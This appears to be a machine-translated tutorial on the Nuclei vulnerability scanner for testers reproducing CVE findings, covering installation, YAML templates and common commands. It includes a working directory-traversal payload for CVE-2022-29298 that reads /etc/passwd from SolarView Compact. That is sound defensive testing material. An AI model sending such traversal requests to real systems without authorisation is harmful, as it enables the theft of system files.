introduce Nuclei Reason

Use dependency check Problems found , Need R & D personnel to repair , The R & D personnel asked to reproduce the problem ！ This is really difficult, not only to understand cve relevant bug The specific meaning of , And simulate attacks , Obviously, the requirements for testers are too high ！ With years of research experience in various testing tools , Intuition tells me , There should be similar tools , After various technical research, I chose Nuclei. Use Nuclei Mainly for cve Relevant problems are simulated , Besides, not all cve This tool can simulate , It is suggested that you can check what needs to be verified before using cve Is the problem nuclei Of template in , If not , You also need to create your own .

Nuclei Basics

Nuclei It's based on YAML Customized quick vulnerability scanner for the development of syntax templates . It USES Go Language development , It has strong configurability 、 Scalability and ease of use .Nuclei Send a request to the target using a custom template with zero false positives , At the same time, it can quickly scan a large number of hosts .Nuclei Provide  dns, file, http, headless, network, workflow, ssl, websocket, whois Wait for the scanning of the agreement , Through powerful and flexible templates , have access to Nuclei Simulate various security checks .

Nuclei install

First installation go Environmental Science （go1.17 Above version ）

Download the installation package of the corresponding platform , The default installation is enough , This article is installed by default windows edition

https://github.com/projectdiscovery/nuclei/releases

Nuclei Introduction to basic use

principle ： according to yaml The content in the template simulates the attack request , Then judge whether there is a vulnerability in the system according to the response results . built-in yaml The file path is as follows ：（ This article only focuses on cve Related loopholes ）

  One of the above yaml The file actually simulates an attack request , With CVE-2022-29298.yaml For example , The document is as follows ：

id: CVE-2022-29298
info:
name: SolarView Compact 6.00 - Directory Traversal
author: ritikchaddha
severity: high
description: SolarView Compact ver.6.00 allows attackers to access sensitive files via directory traversal.
reference:
- https://www.exploit-db.com/exploits/50950
- https://drive.google.com/file/d/1-RHw9ekVidP8zc0xpbzBXnse2gSY1xbH/view
- https://nvd.nist.gov/vuln/detail/CVE-2022-29298
- https://drive.google.com/file/d/1-RHw9ekVidP8zc0xpbzBXnse2gSY1xbH/view?usp=sharing
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-29298
cwe-id: CWE-22
metadata:
shodan-query: http.html:"SolarView Compact"
verified: "true"
tags: cve,cve2022,lfi,solarview
requests:
- method: GET
path:
- "{
   {BaseURL}}/downloader.php?file=../../../../../../../../../../../../../etc/passwd%00.jpg"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: status
status:
- 200

We can focus on the following fields :

severity Express this cve Level of vulnerability

tags, Label indicating that this vulnerability is defined ,cve It means entering cve Tag will execute this yaml

requests, Indicates the request to simulate , About method: GET、path"{ {BaseURL}} "、 I won't explain it in detail , They and http The contents defined in the agreement are consistent .

Matchers, Simply put, it is used to verify the request response , The above code verifies two items in the response ：

By regular way - type: regex Verify the response body Whether there is a regular expression in - "root:.*:0:0:" The content of

Check the status code of the response - type: status Whether it is 200.

These two verification contents are related to ,matchers-condition: and（ The default is or）, About more matcher I will add relevant knowledge to the following article .

About writing http Please refer to

https://nuclei.projectdiscovery.io/templating-guide/protocols/http/

Specifically template Please refer to

https://github.com/projectdiscovery/nuclei/blob/master/SYNTAX-REFERENCE.md

remarks ： from v2.5.2 Start ,nuclei It will be automatically updated at runtime template

Be careful ： Some students here may want to ask what the following grammatical form means ？

- type: status
status:
- 200

This is a yaml grammar , You can baidu by yourself ！

Nuclei Common commands

Nuclei Help document

nuclei –h

I won't go into details here , Check by yourself . Other common commands are as follows ：

1. Yes url https://example.com, Conduct cve Detection of rules （ adopt tags cve）, The detected vulnerability level is critical and high, The author is geeknik

nuclei -u https://example.com -tags cve -severity critical,high -author geeknik -o result.txt

2. Yes url https://example.com, The console outputs statistical results -stats, The detected vulnerability level is critical and high, And output the result to result2.json（ recommend ,json The statistical information in the form of report is very detailed ）

nuclei -u https://example.com -stats -severity critical,high -o result2.json -json -irr

3. Yes url https://example.com, Make template CVE-2022-1439.yaml Detection of , Print request information and response information in detail （-debug）

nuclei -debug -u https://example.com -t \cves\2022\CVE-2022-1439.yaml

4.nuclei It also supports different url scan , Define a txt file , Then save what needs to be scanned url, The specific use is as follows ：

nuclei -list urls.txt

urls.txt The contents are as follows ：

http://example.com

http://app.example.com

http://test.example.com

http://uat.example.com

5. If you want to output the results in different formats , Refer to the following ：

# The output is JSON Format

nuclei -u https://example.com -json

# Save the output results to Markdown Format file

nuclei -u https://example.com -me result

More output , Please refer to nuclei –h Of OUTPUT Field , The contents are as follows ：

OUTPUT:
-o, -output string output file to write found issues/vulnerabilities
-sresp, -store-resp store all request/response passed through nuclei to output directory
-srd, -store-resp-dir string store all request/response passed through nuclei to custom directory (default "output")
-silent display findings only
-nc, -no-color disable output content coloring (ANSI escape codes)
-json write output in JSONL(ines) format
-irr, -include-rr include request/response pairs in the JSONL output (for findings only)
-nm, -no-meta disable printing result metadata in cli output
-nts, -no-timestamp disable printing timestamp in cli output
-rdb, -report-db string nuclei reporting database (always use this to persist report data)
-ms, -matcher-status display match failure status
-me, -markdown-export string directory to export results in markdown format
-se, -sarif-export string file to export results in SARIF format

Customize the detection template

Nuclei Support custom writing YAML Syntax template , You can write your own detection template according to your own needs .

For example, define a template mytemplate.yaml, The contents are as follows ：

id: basic-example

info:
name: Test HTTP Template
author: pdteam
severity: info

requests:
- method: GET
path:
- "{
   {BaseURL}}/"
matchers:
- type: word
words:
- "This is test matcher text"

Invocation time , Execute the following command ：

nuclei -u https://example.com -t mytemplate.yaml

nuclei Use summary

• First confirm the interface to be scanned （http,url）, This is not appscan,zap The tools are convenient , They can actively explore attacks ;
• Then confirm the rules to be scanned , That is to confirm yaml file （ according to tag Select the content you want to detect , for example ：cve、panel、lfi、xss wait ）, We can use nuclei Self contained yaml, You can also customize it yaml, In order to improve scanning efficiency, we can also customize workflows, This topic will be mentioned in later articles ;
• Finally, run the script through the command and generate the test report .